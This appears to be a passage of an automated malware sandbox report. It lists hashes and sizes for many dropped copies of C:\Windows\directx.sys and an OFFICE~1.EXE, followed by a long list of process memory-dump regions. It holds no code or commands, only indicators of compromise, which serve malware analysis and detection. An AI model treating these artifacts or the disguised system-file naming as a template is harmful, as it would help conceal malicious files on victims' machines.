SHA512
3bad74b028f9ff9f7197519649d84803e61bdf52f5f988a4f1a5d7aa488f026b3c671e70998dec821cb5210ef3b438e1f586842ed41b71798bb7864f101a11ee

Download Submit
C:\Windows\directx.sys

Filesize
401B

MD5
5ab36c3b5a6f13d34f6a575a2f72dd61

SHA1
2876e226679c373afa7ea22eade783d17adeaf5a

SHA256
021f2e2c393fec695784c9fd283bbb199b3a7e225e085831c39c8135620e617b

SHA512
65432f71b57655b987af45665ee763468e6d45ecee6e0f4c679ab342cc2cabd69f7a70e92651a20ae76474b700ed8cad20fe7f1db1c7c96b5d02117d920ef4da

Download Submit
C:\Windows\directx.sys

Filesize
399B

MD5
52979e580d17acfbd1c0330d5e449ed5

SHA1
75473d7cb11e446c2f106f61ac50432a13fbe6c7

SHA256
e9ad7b4fdeb884b8c197435fa8642ff2d39c0498b3af0442f20e59043212f625

SHA512
28e2b38a8c3e00f3fe8c4e0ec45c9c5c786908a3bc856ad93cdae4838e69480635c40d7527d4a4c80277b337802f710c7b10b7a348052484bca35881a49ca6db

Download Submit
C:\Windows\directx.sys

Filesize
399B

MD5
9a3389e642d31a13639c6e7e453d7366

SHA1
69dede8d2e5672d0d3c81330968a4e8b7305f8bf

SHA256
50a9cd51763850febd2eb03689ee8a571c1df0a4f8c6f52d0c7a470ac3bd6e34

SHA512
e2c228ef5420c1ee1d17940c14d9990a1c7112f963ef3f8f993b8eb612830cad740488fe5544bdcf75f86cfc0a9f50c65c1d9c0c09f88281f32a7100f87fc9cf

Download Submit
C:\Windows\directx.sys

Filesize
404B

MD5
65422ced7b147ae614a35589e4f36223

SHA1
a5c927cdc64067b9071cc07fafa9cf4b9b079429

SHA256
22bca1319f7f4238d3f3bd2e6eedcd59d760aeaa7b16319c5fd44c9b4c9ae87b

SHA512
832c99750d6d378aaa9134f4e581479683252ae5861e491adc892dff94ca1558d07a8b8b118004ddccc6a38b8781fdd927d17674558863d9e8c7da3a4e3899f3

Download Submit
C:\Windows\directx.sys

Filesize
404B

MD5
746448a96f67f5ffd699bc7b02935749

SHA1
066ba1691e8e5c7cc4af15d338b319199bbf6361

SHA256
e6e3b9d4835fc665e4cea5e3845ebd7d77fc4c761eeebe6067febe9abc877108

SHA512
2ddf73feb315247d1d44c7abaaf6c07264c638ab174bcf6c99a4537ac359f6c2254335c47a4768cb20892f90d2d5b6fe93a3ed4b49b46923b87add090e876eb5

Download Submit
C:\Windows\directx.sys

Filesize
404B

MD5
c79921037ea96482561cbed9970702fc

SHA1
b91733128f49be5e37e23e9ccdbc1a624e7bc22f

SHA256
e79e613976cfaa5543f4987fb767a2b8f19c4d50847a24c4db84280df690f5e3

SHA512
787ac6762e0441fdcc5a9cbe60c213f851c448b24029ce6fee2d60aa8c8b42eba9897825db4703763cc0572daa769db924fd574f7425f03e937f4db8e90bd971

Download Submit
C:\Windows\directx.sys

Filesize
400B

MD5
0c18c29eaebe915bb83371db97479235

SHA1
14cb837d3a18918d78624d56dd40208ad197ffd0

SHA256
964324d60d87366f72b558c79f6f5b3ce7445f1933ec63da93cf77040a8d3110

SHA512
4d806a8db459f197a6a505003e17e02f4d4d3c17c70a77194faf40507872b2f6f4200373185e60ad4d11e40743c14689f0e217c455012fc5199282f38ebbda71

Download Submit
C:\Windows\directx.sys

Filesize
384B

MD5
457ecef78351785e37674291b49a3a99

SHA1
035594cd070d6fb12762a74761150118b8a3574d

SHA256
20549c57928e72a3be009144c1abafea1f0f38a50a2ad4e7872060013480859f

SHA512
a03d08c4e7bab68c328f12f37d8e4dcc419f6dd2e6126b9ecd1141a738f3872921623538a56db0dc187779e3a42ddc9d2c8966dc50e5609e795126dcaf01e931

Download Submit
C:\Windows\directx.sys

Filesize
388B

MD5
68f5d6fe9769d9c342ba1e0f83ce871e

SHA1
778fa46db2770db23252acd199042ed755070185

SHA256
9c1e862828f2935fa73cd24d0ada3167c52411f361df2b7965770890421ee5e1

SHA512
a1e1bc19e5b0ab12c2f3bd8bffea580b15082351e29d3999825abda3767f975ce63fa0e8a05ecc8a19a1756a5ba90f03885eed0cb24a76e5266f67657b7a6e84

Download Submit
C:\Windows\directx.sys

Filesize
408B

MD5
9d4acc048513877218a4209fd23823a3

SHA1
f1aa64bc63d58c52171305c87a67445bccf2ee49

SHA256
f663853558edebe53090e426306e0b63dd80bf582138a5cf5acccd7559fc9029

SHA512
ee9cbad96fb44318c1d1d7009d35db3caf75c17967ad6d0646ae1c82c01fba24b63c066925b347f0fd27ff238f303b26a5d44064560fc5f2c70ef0ef54aeeec9

Download Submit
C:\Windows\directx.sys

Filesize
404B

MD5
9b6dc409ca19e3d103778e20f58223a3

SHA1
96f9a4501eaf5b14daf74e2f5d5fdc013d76f57f

SHA256
0fe107cd53d1e85c8995ac3dd97e5a7bb0e06511a179b739edac91463fbcf5c7

SHA512
b8669dbbb0bca7c523bdbeea5ecdc33a5dd50c6c5606e5dcc4ef216a9da73d2acee3c21634b0858309f9e0c3d2adf22ea7aebad08a37efe3571e3ab0c043f16f

Download Submit
C:\Windows\directx.sys

Filesize
388B

MD5
48e57538784c62a7f86d38ac189ac078

SHA1
1a679b012ec30617068e40f1e4bd88292b206bc6

SHA256
392414a0a348079a8d6dc77003d4ae5652769b62e6f682fa37f76c8924ae73cb

SHA512
abbdb88aece0d1f58376603b85e774b97f4dfda98814be2d412e569c69c47625310c97df82a0a4311eca0cf4d804ddacab246a2fb1de7afd6066e8e32eb63941

Download Submit
C:\Windows\directx.sys

Filesize
442B

MD5
f296d09ad577b16bf674a12d3e71602c

SHA1
472b416f063309f64614dd74ef56ed84c6fbbfdb

SHA256
9b5bf9ea9cd247c549b618f9139a91bb352e5699075e012c93e445242d0b00f6

SHA512
f8435394359f9da7c318a71499aacc7d3be6c6216b483cee8a0962c49b19e919f8bad2410a45dc139a7925f1fa1ac3c52ed60a0ed01d62da5a29504b93acda4e

Download Submit
C:\Windows\directx.sys

Filesize
435B

MD5
6d1aaadd4e6d172d038768f339753b13

SHA1
6157ece9049c1f2893b2ef0b04c8a49b44daaa57

SHA256
386fde732a013ced5269ec9657e32b802f8153d8bfa57ecdea752659595b8265

SHA512
cfc8f4369a71f4c01bf4e9f439d74baa1c5e3fc57c751737f4226cb97e96e3ea3d737a55f7956719c17ae573377ecee4606740f2bbcdac9d2a801051330580ca

Download Submit
C:\Windows\directx.sys

Filesize
426B

MD5
dde0e779f11742a91888fb0e5117c7a4

SHA1
583dbe19c8384e4fea3f54bd7d9fa49ad9ed8d80

SHA256
575c0bc8e2d561f97c88d06a148eaf24096b8f2612c024ef1af93b1f739a90ef

SHA512
944a3203a65ed298e59fc4f41d903ebdf02b4258605ceecbe81d45261a3d459d2749563d08e1eb5858416cda4dea4e5a452c2f69eafb1e604efbeaca9acd1ce3

Download Submit
C:\Windows\directx.sys

Filesize
480B

MD5
64002f9884f51e6bdddd7b51987ab747

SHA1
df557eda69efe5887d518dafa5aadf065babe402

SHA256
7ae69066859ab291f002db606853aff89bb4ebbb43f62ea285a5f5b09b840354

SHA512
5c1e468b2974bee1710c18d12c8e318b9a4b15154e9065061f18d7ebdc0d6bd598aebcc1ec1e83b05e5b36e5745bf046bc6154af21a7865a4bb6838fd724bd88

Download Submit
C:\Windows\directx.sys

Filesize
473B

MD5
8f1ec292869df3bc0e2fb19afaf973f2

SHA1
15ec18d6e218a1638a4e2eee35d0fccccbf65835

SHA256
4321cf7854fe3d9106cbf435aa71047e62beaf998d8ad4c26b72ed334f262379

SHA512
d55b2ef16537904b9a54d07e1f065b2abaaac23c9a31316f719167490142930ed24630a532022fb1cf58083fcdb661e6e7e648ebcd63d76d04bed4fa039690e4

Download Submit
C:\Windows\directx.sys

Filesize
483B

MD5
489011cb3f881fd505024f2ffdc246db

SHA1
bbf8d6cfaa020a7b83e643a0c12e425d339a1d2a

SHA256
57629693bcd7e5cf11337f979fd36714cf42c6293aa3f9288077e1674b4ec87f

SHA512
b6cff56a21b586f8880859c3fe40d0e1257b67d63315ea0859f0017d1e4b5c6b22a1441cb0036c24a74df9b40c50fd81d3395b6fb55e4eede82a6fe9708e9418

Download Submit
C:\Windows\directx.sys

Filesize
480B

MD5
f76d9d6fc38a7bb49fa97776a13903a9

SHA1
8782a995a33710817919132d771655609b8fd896

SHA256
6e3c6f86c1c0c4c2398ebe35cc826c1f81657a9f260f880412e0b428278a82c7

SHA512
92b586a4f2a24eecb4153c382e405f8708b669b498e87afd22e14702c7afdf5f7969455bc0a35cbe7606bd3b382033d5934a42ed292f14c66e88120eca35429f

Download Submit
C:\Windows\directx.sys

Filesize
480B

MD5
2d89b864bc535f3445514794f83e9835

SHA1
5f01ceaa4c8fe089e1ddfa3161b05d6defef8f64

SHA256
03be36b86a4d05ba3ffd5c3491d7d9375f649a9019e26839e8bc45059cb298ea

SHA512
797d4eb46ff2e96aca35ab4e73bdce4fda0c4f6a8f7a4d6e42b2c94d8e01bebac91b2e8fa60986a82a0f4396ab3b9e70087b119aca3839b1523162c03a21b300

Download Submit
C:\Windows\directx.sys

Filesize
431B

MD5
2a7671667608b5a38a7a65c1b0c20e5f

SHA1
d7ad83ee98347fe2b32ffd3a59eb04e5fed5a931

SHA256
5f0d3898aba7ad87024ed3c34b2b76812442ba311ff99a530ebfd7b401fc2ed7

SHA512
875a18d29c0222d1375d4cd3646b30f45a927b4846ad0d51b82ac07a95ef22f45cf344edc32e358add7cb5b5ba2b2ee7357b003641468aa9b4dcba2569f738a6

Download Submit
C:\Windows\directx.sys

Filesize
370B

MD5
b4c6cf253dfec69f0cb7c167e73acde2

SHA1
bf0ccaf7d069258a67960d483fc535b803269f41

SHA256
f09496f6cfa011e88e5effcaac889f27775e1538311f3b01d9efc52421ee6657

SHA512
ea3ee0cdd1575481a6540a4bedaa739b71b3d98e6fe5c0e9f6dc78f76a0c507d331d6059384e7d250df0d94a4bc27622e9e1f2a9b57b9306bd3a5201d39fde8a

Download Submit
C:\Windows\directx.sys

Filesize
328B

MD5
e07844c6b7d3309ae73d51de8df9c8fc

SHA1
4f14a86e314eecc01935fbcd3ea8c0be2759da7c

SHA256
532ad099a39ddd79ef940bf02f337287cbaef09395f87011daa7e0429bdf7ce2

SHA512
e84202995f1bf2f187487105ecf779ea5b4745e8f66b85f38f63c372d5195fe60204ffd058d8d5bae13e3ab0cde516ce9c4c3e7dadd12c1d347ceb4d72d86bd8

Download Submit
C:\Windows\directx.sys

Filesize
330B

MD5
9a5c434e5fd8e0f3c602924fba4490ab

SHA1
9e97d4fe58af3804fb52fb3049f16babed51c862

SHA256
5cda44a6331f70c0f8bb75bfa1dd8a209ae4f538de379b0453e61946fb42f42c

SHA512
1ae820d4d5afdc1c3b68c6204c3e2d2fc7568af7522bea9200cabff19e26e79292f79ef2108856f8081df65b4c91ac9d05729da9431179fe03c7f853c4a25c20

Download Submit
C:\Windows\directx.sys

Filesize
314B

MD5
153cc2cb83408f9a87130a466eb5cc42

SHA1
53255bbe9c5490751ab7a6a55f4d76f363b1a771

SHA256
9b05c07b7b47b169c9941bcfa7915ff8361595ec36b355916b17d4971ab81c81

SHA512
c203921e88fa3d9c38ab2712bb588124a1ade802b1c7ffb1a2db94831b94f26d06bd22069091451008d96855193420dba8581dc148fd538cb114749b082ff31e

Download Submit
C:\Windows\directx.sys

Filesize
352B

MD5
f183e28ebf27a5ec9377a7f40c85bbbc

SHA1
900aa335254b4c55779597760ef0eb2773f4602e

SHA256
4545bb0565cfbc140187040467d975d3cf473550cdb7396ed08d597440d8baa7

SHA512
7e43bebe9c56584208d9ff5c791225979dbd04f0e2c766eaf10135d6a8696aaabf5c660ef02f3c9a4e4217cb4b039cf7aa7a5cb16a95e3a59ef7b6f862d8fde7

Download Submit
C:\Windows\directx.sys

Filesize
352B

MD5
50219a275063ccd08900a91e14fdaad7

SHA1
e6252f2367ce6234892c145340b8840bf2e6707f

SHA256
83ae063de3b77853cc85dff28cf112683f4ad2bade0044e380aa15f68efc4e26

SHA512
7aeb1be1f67334395670a35b19c0264ac1c0ba40c539aefb11250b3a7cfd0170201612bbd0cfe118c358ec75159e27af5e7f7ecde3cc82dee4945a7954d7a11b

Download Submit
C:\Windows\directx.sys

Filesize
352B

MD5
645d71c396457974ea329bc4d946226a

SHA1
d81bfe5e4b278b7aa1d68cf3f7290b8ab385fc29

SHA256
1dcacb88ff6537b4dd8c7c157f6ba4a5a3e864fa1fed5d6f3a843140dc69d1ce

SHA512
a094cf8d1d3dd02c9cb32302d228b26164839eabbc5c63be745df942ec62e650fa4c9c59ab0b6f475b7e45291fc148cea93a20a934b8e565fca860bd347f61a2

Download Submit
C:\Windows\directx.sys

Filesize
352B

MD5
49a8e66edd5576b6fecf78ef13cf39ff

SHA1
3d2a2883cff3d9f2e5d3ba51400861702f848f3d

SHA256
bc1b88f672e13939d76b704a0ea73db0e7c8e6286012f0d11ec1e68974250c73

SHA512
6c09924e643f1fc8eb5470b761a75fa2979b0f0598b7efcaa7e190ec83b2d463fb591fb39f2e4e1a8581a09787aedaec6669fa5aa8957b539d0b05913ab30dfb

Download Submit
C:\Windows\directx.sys

Filesize
352B

MD5
cdf9ae0d8fae37466de410a6c0aa74aa

SHA1
1f6c471be2561cbf77e63f91ae0f38e488367e63

SHA256
240bd3b261d91fc7509f2dd40faa6f9543e8abc1ec131538f2442f065bd4c47d

SHA512
386ca250fa4474fcb27b4e19b61b55fa0cf7825b0e92f16848cd1d940fedee9c8ee12f9b328f3b2e9b43dd850fd01f1c837ba6cd2f5f42982af37d9b3d51d1eb

Download Submit
C:\Windows\directx.sys

Filesize
390B

MD5
ae011446e7846361a9254315c7c75f0d

SHA1
7f548f319ebc52a132a5cbb8c52be9bb7d5fbd57

SHA256
1ebf665ee0c52a3c4647a6cd6fdcdfaded462fc901612573137a020f53315afc

SHA512
8ad6c6f776dd3b01ec7bee454593f43c92be014405ad896da3bd8f4a5ccac99e970b236b1b1aa49508cd51451c557ee0886fb55180840b2510809dd29c64d84a

Download Submit
C:\Windows\directx.sys

Filesize
53B

MD5
399c35b4f86b376533e886c6e59f5ba4

SHA1
037567c80353ac2badc913452c3a176c5dbcb7a0

SHA256
81b61fd24260e4abbc1eff8a76bb617047cf96865237c566732e0e73a369300f

SHA512
d978ca27d76cd8801f167e81f496669b8ed0d646b8904b1161c6b812c82270d3679e53805ba6b89b82371c7eea7232b84711e71e8495850ae701037716fb6fcc

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
73ff8cdd97915bb9ee3f9d294d30753c

SHA1
3373c81e3f9eb2eccccf1ab3167e6b4bc0048b29

SHA256
d1dd6b9a1293397bd416cff6ad6dd00f46f94d10d7fb101ed35fb6d956a2acf0

SHA512
b6c245b5a265ae099b8126bb1452f031c37d0988709dab85cbe81b5ac87e6b2d8ed69d9725cf8432edac78923d823dec3bdd922f40cbac4cb00aa651100ad9f5

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
3ef4be73b6957ef8310ed7bb35cb81f0

SHA1
e13e151d8c5b894b8b1a66439bf43b848761ff09

SHA256
4aeafc821ab0ef8c0940b029c666f9f6ab9a5f2db8bad0e428106ff9b4d8245a

SHA512
02a5e5bda3836fcb6d4dd0bfc6cfbc4b3bf4c9131a6d2db142f2313e83557566e9994fcb0a7f64d7c94ec14511406e9831e5b3eaab692cb34f5571265437fff9

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
7fd08ad52a4900884e4a0993696a4786

SHA1
2a87e0c0a6e12ab657ef92cfd451fdb383457bc3

SHA256
9d76a0c2667a58cc1c530509cfbefb46e8671a1feb23e3d5b6b3e5ca46a79385

SHA512
3e60e21cfab225533b627d16dea3ced629df6c0a0a41f2de8052c02ec48077757cf16701b62399ed9a241555f6440c150aaac0dc1878634b9efa7b5557c9f765

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
010dcd0d6bfe2aed77e9098f5d290843

SHA1
91c0ba048ead98b65b8fa1e2ae84f7545ac8c30c

SHA256
50632c84abd5cc6cb0237ab5d7b295c8db1748cd9eed65b8757f4d08fcc9d041

SHA512
300bf542cfc17b21309f9392c5eef6be9aae8ea0036ac1fd4398a94270566870ef19b7165df39e09c86d2832213af8ca850d27dd1bca9138f9685b0c2cd5efe4

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
e7b2b0efc61cc2b0a13f976c149916d4

SHA1
1456e310f858780b4be96f959ec8fafd6fa7aecd

SHA256
04b7dfe6d6e314f98b3d7dcaf1d19563d03fc53ba5077dae4039f407beecd7ad

SHA512
1f2736a1b0e361b99a35bbd272a78114da8a148052590010e47e5e9945b36094c212392ce3aaacd1338debfabf8f76ccf859ed6820f9aaa4a199e7f786bfa9f5

Download Submit
C:\Windows\directx.sys

Filesize
43B

MD5
31806edd40caa6095d6c7babb6cbba88

SHA1
09d9b6289b1bc32aa638607c6b6d100bc990ee50

SHA256
adda0a3c002330f4bdb2dc41c4ca78495def15038a6c09dee3fec45cec3cd2e4

SHA512
1f062ea0e9fb6431607ebe0119d9f88a9196ea211e05b903eea5507cd0ef8d94d21368b3d57439eb12de97b18c9012827adcf20f8ed1eacacd963f5a7598ecac

Download Submit
C:\Windows\directx.sys

Filesize
96B

MD5
68a4079f1b8219d35ce2d21675609bf1

SHA1
568b4437e7a6a03d3510170b35c6685c84cbe90a

SHA256
37b8dca08fd6b69604ec358804c6083322ccca308833e687c3aaed85c36a1d49

SHA512
b92a64dae2b1d05ae0f6ad574c0b978504fa496d2db133fe92e56ae66c30566694037482a135e1dea1ad77104ea4c5ee5532108b97ae2f113c6c12b034890046

Download Submit
C:\odt\OFFICE~1.EXE

Filesize
1.4MB

MD5
1b52168e10d079260b797e027e969029

SHA1
2833cb756ffc9590b48c184b4d6fd1c5ee82c667

SHA256
ea1c733ccf40748669f18d4d15f98df70b84a725a55b7bd86b4d4a71d4e8a0e2

SHA512
8cb5d89596d9b95416d0e73589240c8e52937dbbc07307235cc689a6ff1af7706434956fcc01b93a0f60316df97fa9bc6f3d85ba0e4eb2ebe0a94284c4e85896

Download Submit
memory/112-1152-0x0000000002430000-0x0000000002431000-memory.dmp

Filesize
4KB

Download
memory/784-0-0x00000000743E0000-0x0000000074B91000-memory.dmp

Filesize
7.7MB

Download
memory/784-5-0x0000000004A30000-0x0000000004A40000-memory.dmp

Filesize
64KB

Download
memory/784-1-0x0000000000010000-0x0000000000018000-memory.dmp

Filesize
32KB

Download
memory/784-2-0x0000000004AA0000-0x0000000004B3C000-memory.dmp

Filesize
624KB

Download
memory/784-3-0x0000000004A30000-0x0000000004A40000-memory.dmp

Filesize
64KB

Download
memory/784-4-0x00000000743E0000-0x0000000074B91000-memory.dmp

Filesize
7.7MB

Download
memory/1148-23-0x0000029D2E760000-0x0000029D2E770000-memory.dmp

Filesize
64KB

Download
memory/1148-28-0x00007FFD75200000-0x00007FFD75CC2000-memory.dmp

Filesize
10.8MB

Download
memory/1148-25-0x0000029D2E760000-0x0000029D2E770000-memory.dmp

Filesize
64KB

Download
memory/1148-24-0x0000029D2E760000-0x0000029D2E770000-memory.dmp

Filesize
64KB

Download
memory/1148-21-0x0000029D2E910000-0x0000029D2E932000-memory.dmp

Filesize
136KB

Download
memory/1148-22-0x00007FFD75200000-0x00007FFD75CC2000-memory.dmp

Filesize
10.8MB

Download
memory/2212-1448-0x0000000000520000-0x0000000000521000-memory.dmp

Filesize
4KB

Download
memory/3292-1361-0x00000000064E0000-0x000000000652C000-memory.dmp

Filesize
304KB

Download
memory/3292-1344-0x00000000063A0000-0x00000000064DC000-memory.dmp

Filesize
1.2MB

Download
memory/3292-1456-0x00000000743E0000-0x0000000074B91000-memory.dmp

Filesize
7.7MB

Download
memory/3292-1282-0x00000000743E0000-0x0000000074B91000-memory.dmp

Filesize
7.7MB

Download
memory/3292-1285-0x0000000000BC0000-0x0000000000D22000-memory.dmp

Filesize
1.4MB

Download
memory/3292-1324-0x00000000058E0000-0x0000000005A36000-memory.dmp

Filesize
1.3MB

Download
memory/3292-1339-0x0000000005A60000-0x0000000005B9E000-memory.dmp

Filesize
1.2MB

Download
memory/3708-1434-0x0000000002940000-0x0000000002950000-memory.dmp

Filesize
64KB

Download
memory/3708-1435-0x0000000005000000-0x00000000050D6000-memory.dmp

Filesize
856KB

Download
memory/3708-1451-0x0000000005A20000-0x0000000005ADE000-memory.dmp

Filesize
760KB

Download
memory/3708-1473-0x00000000743E0000-0x0000000074B91000-memory.dmp

Filesize
7.7MB

Download
memory/3708-1433-0x00000000743E0000-0x0000000074B91000-memory.dmp

Filesize
7.7MB

Download
memory/3708-1430-0x0000000000340000-0x0000000000424000-memory.dmp

Filesize
912KB

Download
memory/3708-1447-0x00000000050E0000-0x000000000519E000-memory.dmp

Filesize
760KB

Download
memory/3944-1472-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1499-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1491-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1463-0x0000000005810000-0x00000000058F6000-memory.dmp

Filesize
920KB

Download
memory/3944-1487-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1485-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1493-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1495-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1479-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1476-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1475-0x00000000743E0000-0x0000000074B91000-memory.dmp

Filesize
7.7MB

Download
memory/3944-1497-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1520-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1483-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1469-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1489-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1467-0x0000000003210000-0x0000000003220000-memory.dmp

Filesize
64KB

Download
memory/3944-1501-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1466-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1505-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1503-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1461-0x0000000000400000-0x000000000049A000-memory.dmp

Filesize
616KB

Download
memory/3944-1509-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1507-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1511-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1513-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1515-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1481-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1518-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/3944-1522-0x0000000005810000-0x00000000058F0000-memory.dmp

Filesize
896KB

Download
memory/4032-44-0x000001DB41A50000-0x000001DB41A60000-memory.dmp

Filesize
64KB

Download
memory/4032-43-0x00007FFD75200000-0x00007FFD75CC2000-memory.dmp

Filesize
10.8MB

Download
memory/4032-45-0x000001DB41A50000-0x000001DB41A60000-memory.dmp

Filesize
64KB

Download
memory/4032-46-0x000001DB41A50000-0x000001DB41A60000-memory.dmp

Filesize
64KB

Download
memory/4032-48-0x00007FFD75200000-0x00007FFD75CC2000-memory.dmp

Filesize
10.8MB

Download
memory/4188-31-0x00007FF62B470000-0x00007FF62B9E6000-memory.dmp

Filesize
5.5MB

Download
memory/4204-1148-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4204-1574-0x0000000000400000-0x0000000000413000-memory.dmp

Filesize
76KB

Download
memory/4816-51-0x00007FF6039D0000-0x00007FF603F46000-memory.dmp

Filesize
5.5MB

Download
memory/4880-1452-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/4880-1580-0x00007FFD95FC0000-0x00007FFD961C9000-memory.dmp

Filesize
2.0MB

Download
memory/4880-1460-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/4880-1445-0x0000000000400000-0x0000000000488000-memory.dmp

Filesize
544KB

Download
memory/4880-1576-0x0000000004260000-0x0000000004660000-memory.dmp

Filesize
4.0MB

Download
memory/4948-1457-0x00000000655C0000-0x0000000065666000-memory.dmp

Filesize
664KB

Download
memory/5244-1477-0x0000000000400000-0x000000000092F000-memory.dmp

Filesize
5.2MB

Download
memory/5244-1470-0x0000000000400000-0x000000000092F000-memory.dmp

Filesize
5.2MB

Download
memory/5588-1118-0x0000000000400000-0x000000000043C000-memory.dmp

Filesize
240KB

Download
memory/5588-1123-0x0000000007A50000-0x0000000007A5A000-memory.dmp

Filesize
40KB

Download
memory/5588-1568-0x000000000C050000-0x000000000C57C000-memory.dmp

Filesize
5.2MB

Download
memory/5588-1128-0x0000000008FC0000-0x000000000900C000-memory.dmp

Filesize
304KB

Download
memory/5588-1446-0x00000000743E0000-0x0000000074B91000-memory.dmp

Filesize
7.7MB

Download
memory/5588-1122-0x00000000079D0000-0x00000000079E0000-memory.dmp

Filesize
64KB

Download
memory/5588-1120-0x0000000007DF0000-0x0000000008396000-memory.dmp

Filesize
5.6MB

Download
memory/5588-1125-0x0000000008EB0000-0x0000000008FBA000-memory.dmp

Filesize
1.0MB

Download
memory/5588-1127-0x0000000008E40000-0x0000000008E7C000-memory.dmp

Filesize
240KB

Download
memory/5588-1126-0x0000000008DE0000-0x0000000008DF2000-memory.dmp

Filesize
72KB

Download
memory/5588-1124-0x0000000009250000-0x0000000009868000-memory.dmp

Filesize
6.1MB

Download
memory/5588-1121-0x0000000007A60000-0x0000000007AF2000-memory.dmp

Filesize
584KB

Download
memory/5588-1561-0x000000000B950000-0x000000000BB12000-memory.dmp

Filesize
1.8MB

Download
memory/5588-1516-0x000000000B210000-0x000000000B276000-memory.dmp

Filesize
408KB

Download
memory/5588-1533-0x000000000B630000-0x000000000B680000-memory.dmp

Filesize
320KB

Download
memory/5588-1119-0x00000000743E0000-0x0000000074B91000-memory.dmp

Filesize
7.7MB

Download
memory/5588-1459-0x00000000079D0000-0x00000000079E0000-memory.dmp

Filesize
64KB

Download
memory/5660-1453-0x0000000000400000-0x000000000092F000-memory.dmp

Filesize
5.2MB

Download
memory/5660-1454-0x0000000000400000-0x000000000092F000-memory.dmp

Filesize
5.2MB

Download
memory/5660-1458-0x0000000000400000-0x000000000092F000-memory.dmp

Filesize
5.2MB

Download
memory/6132-1465-0x0000000000400000-0x0000000000866000-memory.dmp

Filesize
4.4MB

Download
memory/6132-1462-0x0000000000A50000-0x0000000000B50000-memory.dmp

Filesize
1024KB

Download
memory/6132-1138-0x0000000000400000-0x0000000000866000-memory.dmp

Filesize
4.4MB

Download
memory/6132-1137-0x0000000000A10000-0x0000000000A26000-memory.dmp

Filesize
88KB

Download
memory/6132-1136-0x0000000000A50000-0x0000000000B50000-memory.dmp

Filesize
1024KB

Download